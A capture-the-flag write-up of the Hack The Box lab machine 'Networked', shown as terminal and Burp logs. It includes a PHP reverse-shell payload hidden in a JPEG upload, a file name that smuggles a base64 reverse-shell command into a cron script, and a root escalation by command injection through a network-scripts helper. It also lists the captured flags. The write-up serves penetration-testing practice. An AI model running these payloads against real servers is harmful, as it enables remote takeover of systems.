HTB Networked done

Networked

OS:

Linux

Technology:

IP Address:

10.10.10.146

Open ports:

22/tcp  open   ssh     OpenSSH 7.4 (protocol 2.0)
80/tcp  open   http    Apache httpd 2.4.6 ((CentOS) PHP/5.4.16)
443/tcp closed https

Users and pass:

Nmap

┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Networked]
└─$ sudo nmap -A -sV --script=default -p- -oA 10.10.10.146_nmap 10.10.10.146 ; cat 10.10.10.146_nmap.nmap | grep -E "^[0-9]{1,}/(tcp|udp)"
[sudo] password for kali: 
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-19 23:52 UTC
Nmap scan report for 10.10.10.146
Host is up (0.035s latency).
Not shown: 65379 filtered tcp ports (no-response), 153 filtered tcp ports (host-prohibited)
PORT    STATE  SERVICE VERSION
22/tcp  open   ssh     OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey: 
|   2048 22:75:d7:a7:4f:81:a7:af:52:66:e5:27:44:b1:01:5b (RSA)
|   256 2d:63:28:fc:a2:99:c7:d4:35:b9:45:9a:4b:38:f9:c8 (ECDSA)
|_  256 73:cd:a0:5b:84:10:7d:a7:1c:7c:61:1d:f5:54:cf:c4 (ED25519)
80/tcp  open   http    Apache httpd 2.4.6 ((CentOS) PHP/5.4.16)
|_http-server-header: Apache/2.4.6 (CentOS) PHP/5.4.16
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
443/tcp closed https

Ffuz: http://10.10.10.146

┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Networked]
└─$ ffuf -u http://10.10.10.146/FUZZ -c -w /usr/share/wordlists/dirb/big.txt -ac -recursion -recursion-depth=2 -o IP_ffuz -of all -e .php,.html,.txt,.bac,.backup

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://10.10.10.146/FUZZ
 :: Wordlist         : FUZZ: /usr/share/wordlists/dirb/big.txt
 :: Extensions       : .php .html .txt .bac .backup 
 :: Output file      : IP_ffuz.{json,ejson,html,md,csv,ecsv}
 :: File format      : all
 :: Follow redirects : false
 :: Calibration      : true
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________

backup                  [Status: 301, Size: 235, Words: 14, Lines: 8, Duration: 37ms]
[INFO] Adding a new job to the queue: http://10.10.10.146/backup/FUZZ

index.php               [Status: 200, Size: 229, Words: 33, Lines: 9, Duration: 35ms]
lib.php                 [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 37ms]
photos.php              [Status: 200, Size: 1302, Words: 68, Lines: 23, Duration: 40ms]
upload.php              [Status: 200, Size: 169, Words: 11, Lines: 6, Duration: 37ms]
uploads                 [Status: 301, Size: 236, Words: 14, Lines: 8, Duration: 48ms]
[INFO] Adding a new job to the queue: http://10.10.10.146/uploads/FUZZ

[INFO] Starting queued job on target: http://10.10.10.146/backup/FUZZ

[INFO] Starting queued job on target: http://10.10.10.146/uploads/FUZZ

index.html              [Status: 200, Size: 2, Words: 1, Lines: 2, Duration: 35ms]
:: Progress: [122814/122814] :: Job [3/3] :: 1058 req/sec :: Duration: [0:02:00] :: Errors: 0 ::

Open website: http://10.10.10.146

http://10.10.10.146/
---
 Hello mate, we're building the new FaceMash!
Help by funding us and be the new Tyler&Cameron!
Join us at the pool party this Sat to get a glimpse

Read source code: http://10.10.10.146

view-source:http://10.10.10.146/
---
<html>
<body>
Hello mate, we're building the new FaceMash!</br>
Help by funding us and be the new Tyler&Cameron!</br>
Join us at the pool party this Sat to get a glimpse
<!-- upload and gallery not yet linked -->
</body>
</html>

Unpack file: backup.tar

┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Networked]
└─$ wget http://10.10.10.146/backup/backup.tar
--2024-08-20 09:16:26--  http://10.10.10.146/backup/backup.tar
Connecting to 10.10.10.146:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 10240 (10K) [application/x-tar]
Saving to: ‘backup.tar’

backup.tar                    100%[==============================================>]  10.00K  --.-KB/s    in 0s      

2024-08-20 09:16:26 (889 MB/s) - ‘backup.tar’ saved [10240/10240]


┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Networked]
└─$ mkdir backup                              

┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Networked]
└─$ tar -xf backup.tar -C backup              

┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Networked]
└─$ cd backup 

┌──(kali㉿kali)-[~/…/writeups/HTB/HTB_Networked/backup]
└─$ ls
index.php  lib.php  photos.php  upload.php

┌──(kali㉿kali)-[~/…/writeups/HTB/HTB_Networked/backup]

Read file: upload.php

I see that I have to upload small file less that < 60000
---
┌──(kali㉿kali)-[~/…/writeups/HTB/HTB_Networked/backup]
└─$ cat upload.php
<?php
require '/var/www/html/lib.php';

define("UPLOAD_DIR", "/var/www/html/uploads/");

if( isset($_POST['submit']) ) {
  if (!empty($_FILES["myFile"])) {
    $myFile = $_FILES["myFile"];

    if (!(check_file_type($_FILES["myFile"]) && filesize($_FILES['myFile']['tmp_name']) < 60000)) {
      echo '<pre>Invalid image file.</pre>';
      displayform();
    }

    if ($myFile["error"] !== UPLOAD_ERR_OK) {
        echo "<p>An error occurred.</p>";
        displayform();
        exit;
    }

    //$name = $_SERVER['REMOTE_ADDR'].'-'. $myFile["name"];
    list ($foo,$ext) = getnameUpload($myFile["name"]);
    $validext = array('.jpg', '.png', '.gif', '.jpeg');
    $valid = false;
    foreach ($validext as $vext) {
      if (substr_compare($myFile["name"], $vext, -strlen($vext)) === 0) {
        $valid = true;
      }
    }

    if (!($valid)) {
      echo "<p>Invalid image file</p>";
      displayform();
      exit;
    }
    $name = str_replace('.','_',$_SERVER['REMOTE_ADDR']).'.'.$ext;

    $success = move_uploaded_file($myFile["tmp_name"], UPLOAD_DIR . $name);
    if (!$success) {
        echo "<p>Unable to save file.</p>";
        exit;
    }
    echo "<p>file uploaded, refresh gallery</p>";

    // set proper permissions on the new file
    chmod(UPLOAD_DIR . $name, 0644);
  }
} else {
  displayform();
}
?>

Upload file

Sent request to remote host - Burp

I added to file *.jpg payload:
<?php
exec("/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.25/80 0>&1'");
?>
and change file name to: file.php.jpg
---
Request - Burp
___
POST /upload.php HTTP/1.1
Host: 10.10.10.146
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data; boundary=---------------------------226325157714368244483425860449
Content-Length: 1939
Origin: http://10.10.10.146
Connection: keep-alive
Referer: http://10.10.10.146/upload.php
Upgrade-Insecure-Requests: 1

-----------------------------226325157714368244483425860449
Content-Disposition: form-data; name="myFile"; filename="file3.php.jpg"
Content-Type: image/jpeg

ÿØÿàJFIF


HHÿÛCÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÛC
ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÀê
9
"

ÿÄ




ÿÄ$








!1AQqa‘±¡ÁðÿÄ



ÿÄ



ÿÚ
?Êâ/ Š‚
`C ³S0çnµêcA©>3V¨1eÔ]<ò¼~VÏ1¸©†ÔÞ
x6f2€ÖšŠ
A™q­ß ¤ò
oð‡·|§@Ö¦ü³¸h/§‹VÞuÀ'ª]Ô·S;
fߔ³Cü^¿b2¿¤Å@
¦¥a¨
“½¦þ?ià¶|0Ò`¢Í\óK q?5>‘`-õpœYß%•3æb/Ò٘"ÉØ'CÛ[ϚªæÜôߥ0ȼ%›Ò(9âãVk2åV_”ÏÜ=¿ýPZ¶lg™Å<vø–rº·H^LùòtðDQ5•Q¬¨%E¨›1žÓì¹àUãåq…Ü€¶ÿŒâƤ€Ì-·†½±xŠŒÉ~¿Öº@
ÄÍPtí–6ŠÝ›ç¦^×qf!m¿@½ÃÝ'„—ø˜
nøg 2¢ÿê/Â
}$jtŠÍkoL҂ˆÔôðeérA ÑDÄP
c>«gK«y=¿+}_ÅÙ´\@4
œ°’ùn%¼¢¦'Ú³ƒs,c•œí1®/ásì8Bˆ»©ÒÉäèUœ–_ƒà[ÍPC¶“4    ùtfI>ÍT]DP
A   tdOw=y„ôà4ÊÛ#2‚›‹g¬ûc<Ãh7²3îdÛà‹
@ÍU3Êúgz¼EÔS#9<4t#궦Š4Òã*7Ä5T$ß*²È¨Š€*Ò$¾?'æ(¬ú­:çú æ±lʖՆ(&( ‚³îøŽ#@_r[h/¸·ÕøOwàØ
m©ÊÔQªÏÛLÔ ª MDO5U
PòKâ‡`Ò+«;gIt€&(¸áÄí›A®#>÷ˆ¶ÐH&¢’üµú¿Âz~kY
ȸ¬€Ñ©)y¨5ªÎ* LÁ¤gj]½‚ÛâR-ERBÙ
Y¾¯„¶Ð@Q
FæøfMtü@?ê¥Ù8ðÇ¿ð"|ˆ«Á“à‰ %â‹Ø©Ÿêª(@
¤U0ûM‘Ð[~
TVI|‚ÏøÞÉ5Œ¾9.ñÀ­êdøOWLmù º¬˜‚¦,
2€¨4ËP@€B߄·P@@@ÔPkSÜc(­Û>|3À¸¢ã65zNg–´ÖTj؀"€
"€¨¸ÓéØ ŠXÐ âЊŠƒK€ÍB¬¸¡™6Ÿ’ÝDt™å•T[‰§ «À‹—áDU
ePE\€Êé` Š”_¨»€/f€¾"ë*
»ùdE:MQ¸—ðH³Žabás¡†+6"šº‹
/H
ËLÕ@
q0@]A "¡¨*€ÍTA@0Ƅ«d@ꊋ/Ú   ¦ÓEVZÑU*J ¡ j2°¨ªˆ¢¢‚*¨¢4”n ¨FWö‚«¶Á-ej ª¨JŠ©ßÙØ
‹:Q<¬@E@X¸b‚³Bö
¦¢‚éá<
EP
(í"|€*?ÿÙ<?php
exec("/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.25/80 0>&1'");
?>
-----------------------------226325157714368244483425860449
Content-Disposition: form-data; name="submit"

go!
-----------------------------226325157714368244483425860449--
---
Response - Burp
___
HTTP/1.1 200 OK
Date: Tue, 20 Aug 2024 10:41:26 GMT
Server: Apache/2.4.6 (CentOS) PHP/5.4.16
X-Powered-By: PHP/5.4.16
Content-Length: 37
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

<p>file uploaded, refresh gallery</p>
---

Start netcat

┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Networked]
└─$ netcat -lvnp 80
listening on [any] 80 ...
connect to [10.10.14.25] from (UNKNOWN) [10.10.10.146] 32836
bash: no job control in this shell
bash-4.2$ 

Open website: http://10.10.10.146/photos.php

Open the website and run revshell
---
http://10.10.10.146/photos.php

Read file: /home/guly/check_attack.php

┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Networked]
└─$ netcat -lvnp 80
listening on [any] 80 ...
connect to [10.10.14.25] from (UNKNOWN) [10.10.10.146] 32836
bash: no job control in this shell
bash-4.2$ script /dev/null -c /bin/bash
script /dev/null -c /bin/bash
bash-4.2$ 
bash-4.2$ find / -name "user.txt" 2>/dev/null
/home/guly/user.txt
bash-4.2$ cd /home/guly
bash-4.2$ ls -a
.   .bash_history  .bash_profile  check_attack.php  user.txt
..  .bash_logout   .bashrc    crontab.guly
bash-4.2$ 
bash-4.2$ cat crontab.guly
*/3 * * * * php /home/guly/check_attack.php
bash-4.2$ ls -la /home/guly/check_attack.php
-r--r--r--. 1 root root 782 Oct 30  2018 /home/guly/check_attack.php
bash-4.2$ cat /home/guly/check_attack.php
<?php
require '/var/www/html/lib.php';
$path = '/var/www/html/uploads/';
$logpath = '/tmp/attack.log';
$to = 'guly';
$msg= '';
$headers = "X-Mailer: check_attack.php\r\n";

$files = array();
$files = preg_grep('/^([^.])/', scandir($path));

foreach ($files as $key => $value) {
    $msg='';
  if ($value == 'index.html') {
    continue;
  }
  #echo "-------------\n";

  #print "check: $value\n";
  list ($name,$ext) = getnameCheck($value);
  $check = check_ip($name,$value);

  if (!($check[0])) {
    echo "attack!\n";
    # todo: attach file
    file_put_contents($logpath, $msg, FILE_APPEND | LOCK_EX);

    exec("rm -f $logpath");
    exec("nohup /bin/rm -f $path$value > /dev/null 2>&1 &");
    echo "rm -f $path$value\n";
    mail($to, $msg, $msg, $headers, "-F$value");
  }
}

?>
bash-4.2$ 

Create a revshell - user guly

Analyst a file: /home/guly/check_attack.php

I can change $value and put my value (revshell)
`
exec("nohup /bin/rm -f $path$value > /dev/null 2>&1 &");
`

Create decode revshell

┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Networked]
└─$ echo -n '/bin/bash -c "bash -i >& /dev/tcp/10.10.14.25/443 0>&1"' | base64
L2Jpbi9iYXNoIC1jICJiYXNoIC1pID4mIC9kZXYvdGNwLzEwLjEwLjE0LjI1LzQ0MyAwPiYxIg==

Create a revshell as fake file

bash-4.2$ cd /var/www/html/uploads
bash-4.2$ touch 'fake_file; echo L2Jpbi9iYXNoIC1jICJiYXNoIC1pID4mIC9kZXYvdGNwLzEwLjEwLjE0LjI1LzQ0MyAwPiYxIg== | base64 -d | bash'
bash-4.2$ 

Start netcat

┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Networked]
└─$ netcat -lvnp 443
listening on [any] 443 ...
connect to [10.10.14.25] from (UNKNOWN) [10.10.10.146] 36224
bash: no job control in this shell
[guly@networked ~]$ id
id
uid=1000(guly) gid=1000(guly) groups=1000(guly)

Read flag: user.txt

guly@networked ~]$ cd ~
cd ~
[guly@networked ~]$ ls -a
ls -a
.
..
.bash_history
.bash_logout
.bash_profile
.bashrc
check_attack.php
crontab.guly
user.txt
[guly@networked ~]$ type user.txt ; id ; ip a
type user.txt ; id ; ip a
bash: type: user.txt: not found
uid=1000(guly) gid=1000(guly) groups=1000(guly)
bash: ip: command not found
[guly@networked ~]$   

[guly@networked ~]$ cat user.txt ; id ; ipconfig
cat user.txt ; id ; ipconfig
88f49d25bb0edf1bd410cc6cd770c625
uid=1000(guly) gid=1000(guly) groups=1000(guly)
bash: ipconfig: command not found
[guly@networked ~]$ 

Privilege Escalation

sudo -l

[guly@networked ~]$ sudo -l
sudo -l
Matching Defaults entries for guly on networked:
    !visiblepw, always_set_home, match_group_by_gid, always_query_group_plugin,
    env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE KDEDIR LS_COLORS",
    env_keep+="MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE",
    env_keep+="LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES",
    env_keep+="LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE",
    env_keep+="LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY",
    secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin

User guly may run the following commands on networked:
    (root) NOPASSWD: /usr/local/sbin/changename.sh

Analysis script

[guly@networked ~]$ ls -la /usr/local/sbin/changename.sh
ls -la /usr/local/sbin/changename.sh
-rwxr-xr-x 1 root root 422 Jul  8  2019 /usr/local/sbin/changename.sh
[guly@networked ~]$ 

[guly@networked ~]$ cat /usr/local/sbin/changename.sh
cat /usr/local/sbin/changename.sh
#!/bin/bash -p
cat > /etc/sysconfig/network-scripts/ifcfg-guly << EoF
DEVICE=guly0
ONBOOT=no
NM_CONTROLLED=no
EoF

regexp="^[a-zA-Z0-9_\ /-]+$"

for var in NAME PROXY_METHOD BROWSER_ONLY BOOTPROTO; do
    echo "interface $var:"
    read x
    while [[ ! $x =~ $regexp ]]; do
        echo "wrong input, try again"
        echo "interface $var:"
        read x
    done
    echo $var=$x >> /etc/sysconfig/network-scripts/ifcfg-guly
done

/sbin/ifup guly0

Privilage escalation via script: /usr/local/sbin/changename.sh

[root@networked network-scripts]# sudo /usr/local/sbin/changename.sh
sudo /usr/local/sbin/changename.sh
interface NAME:
a id
a id
interface PROXY_METHOD:
b whoami
b whoami
interface BROWSER_ONLY:
c /bin/bash
c /bin/bash
interface BOOTPROTO:
d w        
d w
uid=0(root) gid=0(root) groups=0(root)
root

Read flag: root.txt

[root@networked network-scripts]# cd /root
cd /root
[root@networked ~]# ls -a
ls -a
.   .bash_history  .bash_profile  .cshrc    .tcshrc
..  .bash_logout   .bashrc    root.txt  .viminfo
[root@networked ~]#    

[root@networked ~]# cat root.txt ; id ; ip a
cat root.txt ; id ; ip a
b1729771b539a3f8a9cb8bd1b10ffc51
uid=0(root) gid=0(root) groups=0(root)
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
    link/ether 00:50:56:94:37:f2 brd ff:ff:ff:ff:ff:ff
    inet 10.10.10.146/24 brd 10.10.10.255 scope global eth0
       valid_lft forever preferred_lft forever
    inet6 dead:beef::250:56ff:fe94:37f2/64 scope global mngtmpaddr dynamic 
       valid_lft 86398sec preferred_lft 14398sec
    inet6 fe80::250:56ff:fe94:37f2/64 scope link 
       valid_lft forever preferred_lft forever
[root@networked ~]# 

References

[Redhat/CentOS root through network-scripts](https://seclists.org/fulldisclosure/2019/Apr/24)

Lessons Learned

Tags